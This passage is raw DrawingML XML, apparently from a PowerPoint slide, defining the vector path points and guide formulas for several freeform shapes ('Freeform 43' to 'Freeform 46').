                      <a:pt x="153" y="311"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="137" y="337"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="137" y="337"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="127" y="358"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="121" y="384"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="121" y="384"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="127" y="400"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="142" y="421"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="142" y="421"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="158" y="431"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="179" y="437"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="195" y="437"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="216" y="431"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="216" y="431"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="242" y="415"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="268" y="394"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="337" y="337"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="337" y="337"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="394" y="268"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="415" y="242"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="431" y="216"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="431" y="216"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="436" y="195"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="436" y="174"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="431" y="158"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="421" y="143"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="421" y="143"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="400" y="127"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="378" y="121"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="378" y="121"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="357" y="127"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="331" y="132"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="331" y="132"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="310" y="153"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="284" y="174"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="284" y="174"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="226" y="227"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="226" y="227"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="174" y="284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2" name="Freeform 43"/>
              <p:cNvSpPr>
                <a:spLocks noChangeArrowheads="1"/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="6834188" y="1976438"/>
                <a:ext cx="223837" cy="173037"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 509 w 621"/>
                  <a:gd name="T1" fmla="*/ 99 h 479"/>
                  <a:gd name="T2" fmla="*/ 452 w 621"/>
                  <a:gd name="T3" fmla="*/ 147 h 479"/>
                  <a:gd name="T4" fmla="*/ 452 w 621"/>
                  <a:gd name="T5" fmla="*/ 152 h 479"/>
                  <a:gd name="T6" fmla="*/ 452 w 621"/>
                  <a:gd name="T7" fmla="*/ 152 h 479"/>
                  <a:gd name="T8" fmla="*/ 499 w 621"/>
                  <a:gd name="T9" fmla="*/ 147 h 479"/>
                  <a:gd name="T10" fmla="*/ 536 w 621"/>
                  <a:gd name="T11" fmla="*/ 147 h 479"/>
                  <a:gd name="T12" fmla="*/ 536 w 621"/>
                  <a:gd name="T13" fmla="*/ 147 h 479"/>
                  <a:gd name="T14" fmla="*/ 556 w 621"/>
                  <a:gd name="T15" fmla="*/ 152 h 479"/>
                  <a:gd name="T16" fmla="*/ 573 w 621"/>
                  <a:gd name="T17" fmla="*/ 162 h 479"/>
                  <a:gd name="T18" fmla="*/ 588 w 621"/>
                  <a:gd name="T19" fmla="*/ 173 h 479"/>
                  <a:gd name="T20" fmla="*/ 604 w 621"/>
                  <a:gd name="T21" fmla="*/ 189 h 479"/>
                  <a:gd name="T22" fmla="*/ 604 w 621"/>
                  <a:gd name="T23" fmla="*/ 189 h 479"/>
                  <a:gd name="T24" fmla="*/ 614 w 621"/>
                  <a:gd name="T25" fmla="*/ 194 h 479"/>
                  <a:gd name="T26" fmla="*/ 614 w 621"/>
                  <a:gd name="T27" fmla="*/ 194 h 479"/>
                  <a:gd name="T28" fmla="*/ 620 w 621"/>
                  <a:gd name="T29" fmla="*/ 210 h 479"/>
                  <a:gd name="T30" fmla="*/ 520 w 621"/>
                  <a:gd name="T31" fmla="*/ 299 h 479"/>
                  <a:gd name="T32" fmla="*/ 520 w 621"/>
                  <a:gd name="T33" fmla="*/ 299 h 479"/>
                  <a:gd name="T34" fmla="*/ 504 w 621"/>
                  <a:gd name="T35" fmla="*/ 283 h 479"/>
                  <a:gd name="T36" fmla="*/ 504 w 621"/>
                  <a:gd name="T37" fmla="*/ 283 h 479"/>
                  <a:gd name="T38" fmla="*/ 494 w 621"/>
                  <a:gd name="T39" fmla="*/ 262 h 479"/>
                  <a:gd name="T40" fmla="*/ 494 w 621"/>
                  <a:gd name="T41" fmla="*/ 262 h 479"/>
                  <a:gd name="T42" fmla="*/ 462 w 621"/>
                  <a:gd name="T43" fmla="*/ 241 h 479"/>
                  <a:gd name="T44" fmla="*/ 462 w 621"/>
                  <a:gd name="T45" fmla="*/ 241 h 479"/>
                  <a:gd name="T46" fmla="*/ 446 w 621"/>
                  <a:gd name="T47" fmla="*/ 231 h 479"/>
                  <a:gd name="T48" fmla="*/ 426 w 621"/>
                  <a:gd name="T49" fmla="*/ 225 h 479"/>
                  <a:gd name="T50" fmla="*/ 426 w 621"/>
                  <a:gd name="T51" fmla="*/ 225 h 479"/>
                  <a:gd name="T52" fmla="*/ 409 w 621"/>
                  <a:gd name="T53" fmla="*/ 225 h 479"/>
                  <a:gd name="T54" fmla="*/ 389 w 621"/>
                  <a:gd name="T55" fmla="*/ 231 h 479"/>
                  <a:gd name="T56" fmla="*/ 389 w 621"/>
                  <a:gd name="T57" fmla="*/ 231 h 479"/>
                  <a:gd name="T58" fmla="*/ 368 w 621"/>
                  <a:gd name="T59" fmla="*/ 236 h 479"/>
                  <a:gd name="T60" fmla="*/ 347 w 621"/>
                  <a:gd name="T61" fmla="*/ 252 h 479"/>
                  <a:gd name="T62" fmla="*/ 95 w 621"/>
                  <a:gd name="T63" fmla="*/ 478 h 479"/>
                  <a:gd name="T64" fmla="*/ 0 w 621"/>
                  <a:gd name="T65" fmla="*/ 372 h 479"/>
                  <a:gd name="T66" fmla="*/ 415 w 621"/>
                  <a:gd name="T67" fmla="*/ 0 h 479"/>
                  <a:gd name="T68" fmla="*/ 509 w 621"/>
                  <a:gd name="T69" fmla="*/ 99 h 4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21" h="479">
                    <a:moveTo>
                      <a:pt x="509" y="99"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="452" y="147"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="452" y="152"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="452" y="152"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="499" y="147"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="536" y="147"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="536" y="147"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="556" y="152"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="573" y="162"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="588" y="173"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="604" y="189"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="604" y="189"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="614" y="194"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="614" y="194"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="620" y="210"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="520" y="299"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="520" y="299"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="504" y="283"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="504" y="283"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="494" y="262"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="494" y="262"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="462" y="241"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="462" y="241"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="446" y="231"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="426" y="225"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="426" y="225"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="409" y="225"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="389" y="231"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="389" y="231"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="368" y="236"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="347" y="252"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="95" y="478"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="372"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="415" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="509" y="99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3" name="Freeform 44"/>
              <p:cNvSpPr>
                <a:spLocks noChangeArrowheads="1"/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="6913563" y="2030413"/>
                <a:ext cx="258762" cy="301625"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 362 w 720"/>
                  <a:gd name="T1" fmla="*/ 357 h 836"/>
                  <a:gd name="T2" fmla="*/ 367 w 720"/>
                  <a:gd name="T3" fmla="*/ 362 h 836"/>
                  <a:gd name="T4" fmla="*/ 619 w 720"/>
                  <a:gd name="T5" fmla="*/ 341 h 836"/>
                  <a:gd name="T6" fmla="*/ 719 w 720"/>
                  <a:gd name="T7" fmla="*/ 467 h 836"/>
                  <a:gd name="T8" fmla="*/ 446 w 720"/>
                  <a:gd name="T9" fmla="*/ 478 h 836"/>
                  <a:gd name="T10" fmla="*/ 299 w 720"/>
                  <a:gd name="T11" fmla="*/ 835 h 836"/>
                  <a:gd name="T12" fmla="*/ 199 w 720"/>
                  <a:gd name="T13" fmla="*/ 709 h 836"/>
                  <a:gd name="T14" fmla="*/ 305 w 720"/>
                  <a:gd name="T15" fmla="*/ 473 h 836"/>
                  <a:gd name="T16" fmla="*/ 220 w 720"/>
                  <a:gd name="T17" fmla="*/ 478 h 836"/>
                  <a:gd name="T18" fmla="*/ 89 w 720"/>
                  <a:gd name="T19" fmla="*/ 577 h 836"/>
                  <a:gd name="T20" fmla="*/ 0 w 720"/>
                  <a:gd name="T21" fmla="*/ 467 h 836"/>
                  <a:gd name="T22" fmla="*/ 582 w 720"/>
                  <a:gd name="T23" fmla="*/ 0 h 836"/>
                  <a:gd name="T24" fmla="*/ 672 w 720"/>
                  <a:gd name="T25" fmla="*/ 116 h 836"/>
                  <a:gd name="T26" fmla="*/ 362 w 720"/>
                  <a:gd name="T27" fmla="*/ 357 h 8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20" h="836">
                    <a:moveTo>
                      <a:pt x="362" y="357"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="367" y="362"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="619" y="341"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="719" y="467"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="446" y="478"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="299" y="835"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="199" y="709"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="305" y="473"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="220" y="478"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="89" y="577"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="467"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="582" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="672" y="116"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="362" y="357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4" name="Freeform 45"/>
              <p:cNvSpPr>
                <a:spLocks noChangeArrowheads="1"/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="7096125" y="2289175"/>
                <a:ext cx="271463" cy="239713"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 157 w 752"/>
                  <a:gd name="T1" fmla="*/ 368 h 668"/>
                  <a:gd name="T2" fmla="*/ 131 w 752"/>
                  <a:gd name="T3" fmla="*/ 399 h 668"/>
                  <a:gd name="T4" fmla="*/ 131 w 752"/>
                  <a:gd name="T5" fmla="*/ 436 h 668"/>
                  <a:gd name="T6" fmla="*/ 152 w 752"/>
                  <a:gd name="T7" fmla="*/ 483 h 668"/>
                  <a:gd name="T8" fmla="*/ 200 w 752"/>
                  <a:gd name="T9" fmla="*/ 520 h 668"/>
                  <a:gd name="T10" fmla="*/ 237 w 752"/>
                  <a:gd name="T11" fmla="*/ 525 h 668"/>
                  <a:gd name="T12" fmla="*/ 273 w 752"/>
                  <a:gd name="T13" fmla="*/ 510 h 668"/>
                  <a:gd name="T14" fmla="*/ 310 w 752"/>
                  <a:gd name="T15" fmla="*/ 478 h 668"/>
                  <a:gd name="T16" fmla="*/ 326 w 752"/>
                  <a:gd name="T17" fmla="*/ 441 h 668"/>
                  <a:gd name="T18" fmla="*/ 326 w 752"/>
                  <a:gd name="T19" fmla="*/ 394 h 668"/>
                  <a:gd name="T20" fmla="*/ 299 w 752"/>
                  <a:gd name="T21" fmla="*/ 279 h 668"/>
                  <a:gd name="T22" fmla="*/ 294 w 752"/>
                  <a:gd name="T23" fmla="*/ 195 h 668"/>
                  <a:gd name="T24" fmla="*/ 315 w 752"/>
                  <a:gd name="T25" fmla="*/ 126 h 668"/>
                  <a:gd name="T26" fmla="*/ 362 w 752"/>
                  <a:gd name="T27" fmla="*/ 69 h 668"/>
                  <a:gd name="T28" fmla="*/ 441 w 752"/>
                  <a:gd name="T29" fmla="*/ 21 h 668"/>
                  <a:gd name="T30" fmla="*/ 567 w 752"/>
                  <a:gd name="T31" fmla="*/ 5 h 668"/>
                  <a:gd name="T32" fmla="*/ 641 w 752"/>
                  <a:gd name="T33" fmla="*/ 48 h 668"/>
                  <a:gd name="T34" fmla="*/ 704 w 752"/>
                  <a:gd name="T35" fmla="*/ 121 h 668"/>
                  <a:gd name="T36" fmla="*/ 745 w 752"/>
                  <a:gd name="T37" fmla="*/ 205 h 668"/>
                  <a:gd name="T38" fmla="*/ 751 w 752"/>
                  <a:gd name="T39" fmla="*/ 284 h 668"/>
                  <a:gd name="T40" fmla="*/ 725 w 752"/>
                  <a:gd name="T41" fmla="*/ 357 h 668"/>
                  <a:gd name="T42" fmla="*/ 641 w 752"/>
                  <a:gd name="T43" fmla="*/ 431 h 668"/>
                  <a:gd name="T44" fmla="*/ 598 w 752"/>
                  <a:gd name="T45" fmla="*/ 284 h 668"/>
                  <a:gd name="T46" fmla="*/ 625 w 752"/>
                  <a:gd name="T47" fmla="*/ 252 h 668"/>
                  <a:gd name="T48" fmla="*/ 625 w 752"/>
                  <a:gd name="T49" fmla="*/ 199 h 668"/>
                  <a:gd name="T50" fmla="*/ 598 w 752"/>
                  <a:gd name="T51" fmla="*/ 163 h 668"/>
                  <a:gd name="T52" fmla="*/ 572 w 752"/>
                  <a:gd name="T53" fmla="*/ 142 h 668"/>
                  <a:gd name="T54" fmla="*/ 541 w 752"/>
                  <a:gd name="T55" fmla="*/ 142 h 668"/>
                  <a:gd name="T56" fmla="*/ 494 w 752"/>
                  <a:gd name="T57" fmla="*/ 158 h 668"/>
                  <a:gd name="T58" fmla="*/ 451 w 752"/>
                  <a:gd name="T59" fmla="*/ 199 h 668"/>
                  <a:gd name="T60" fmla="*/ 446 w 752"/>
                  <a:gd name="T61" fmla="*/ 231 h 668"/>
                  <a:gd name="T62" fmla="*/ 473 w 752"/>
                  <a:gd name="T63" fmla="*/ 399 h 668"/>
                  <a:gd name="T64" fmla="*/ 473 w 752"/>
                  <a:gd name="T65" fmla="*/ 483 h 668"/>
                  <a:gd name="T66" fmla="*/ 462 w 752"/>
                  <a:gd name="T67" fmla="*/ 541 h 668"/>
                  <a:gd name="T68" fmla="*/ 431 w 752"/>
                  <a:gd name="T69" fmla="*/ 588 h 668"/>
                  <a:gd name="T70" fmla="*/ 378 w 752"/>
                  <a:gd name="T71" fmla="*/ 625 h 668"/>
                  <a:gd name="T72" fmla="*/ 241 w 752"/>
                  <a:gd name="T73" fmla="*/ 667 h 668"/>
                  <a:gd name="T74" fmla="*/ 157 w 752"/>
                  <a:gd name="T75" fmla="*/ 640 h 668"/>
                  <a:gd name="T76" fmla="*/ 53 w 752"/>
                  <a:gd name="T77" fmla="*/ 530 h 668"/>
                  <a:gd name="T78" fmla="*/ 5 w 752"/>
                  <a:gd name="T79" fmla="*/ 431 h 668"/>
                  <a:gd name="T80" fmla="*/ 0 w 752"/>
                  <a:gd name="T81" fmla="*/ 346 h 668"/>
                  <a:gd name="T82" fmla="*/ 68 w 752"/>
                  <a:gd name="T83" fmla="*/ 242 h 668"/>
                  <a:gd name="T84" fmla="*/ 210 w 752"/>
                  <a:gd name="T85" fmla="*/ 326 h 6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752" h="668">
                    <a:moveTo>
                      <a:pt x="194" y="336"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="194" y="336"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="157" y="368"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="157" y="368"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="142" y="383"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="131" y="399"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="131" y="399"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="131" y="415"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="131" y="436"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="131" y="436"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="137" y="457"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="152" y="483"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="152" y="483"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="173" y="504"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="200" y="520"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="200" y="520"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="220" y="525"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="237" y="525"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="257" y="520"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="273" y="510"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="273" y="510"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="294" y="493"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="310" y="478"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="310" y="478"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="315" y="463"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="326" y="441"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="326" y="441"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="326" y="420"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="326" y="394"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="326" y="394"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="310" y="326"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="310" y="326"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="299" y="279"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="294" y="236"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="294" y="236"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="294" y="195"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="299" y="158"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="299" y="158"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="315" y="126"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="336" y="95"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="336" y="95"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="362" y="69"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="394" y="42"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="394" y="42"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="441" y="21"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="483" y="5"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="525" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="567" y="5"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="567" y="5"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="604" y="21"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="641" y="48"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="672" y="79"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="704" y="121"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="704" y="121"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="725" y="163"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="745" y="205"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="745" y="205"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="751" y="247"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="751" y="284"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="751" y="284"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="745" y="320"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="725" y="357"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="725" y="357"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="698" y="394"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="656" y="420"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="641" y="431"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="561" y="310"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="561" y="310"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="598" y="284"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="614" y="268"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="625" y="252"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="625" y="252"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="625" y="236"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="625" y="221"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="625" y="199"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="614" y="184"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="614" y="184"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="598" y="163"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="583" y="152"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="583" y="152"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="572" y="142"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="557" y="142"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="557" y="142"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="541" y="142"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="525" y="142"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="525" y="142"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="494" y="158"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="494" y="158"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="473" y="179"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="451" y="199"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="451" y="199"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="451" y="216"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="446" y="231"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="451" y="279"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="473" y="399"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="473" y="399"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="478" y="446"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="473" y="483"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="473" y="483"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="473" y="515"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="462" y="541"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="462" y="541"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="446" y="567"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="431" y="588"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="431" y="588"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="410" y="610"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="378" y="625"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="378" y="625"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="331" y="651"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="284" y="667"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="241" y="667"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="200" y="662"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="200" y="662"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="157" y="640"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="120" y="614"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="84" y="578"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="53" y="530"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="53" y="530"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="26" y="478"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="5" y="431"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="383"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="346"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="346"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="16" y="310"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="37" y="273"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="68" y="242"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="105" y="216"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="131" y="199"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="210" y="326"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="194" y="336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5" name="Freeform 46"/>
              <p:cNvSpPr>
                <a:spLocks noChangeArrowheads="1"/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="7196138" y="2498725"/>
                <a:ext cx="209550" cy="182563"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 200 w 584"/>
                  <a:gd name="T1" fmla="*/ 221 h 505"/>
                  <a:gd name="T2" fmla="*/ 158 w 584"/>
                  <a:gd name="T3" fmla="*/ 247 h 505"/>
                  <a:gd name="T4" fmla="*/ 126 w 584"/>
                  <a:gd name="T5" fmla="*/ 278 h 505"/>
                  <a:gd name="T6" fmla="*/ 110 w 584"/>
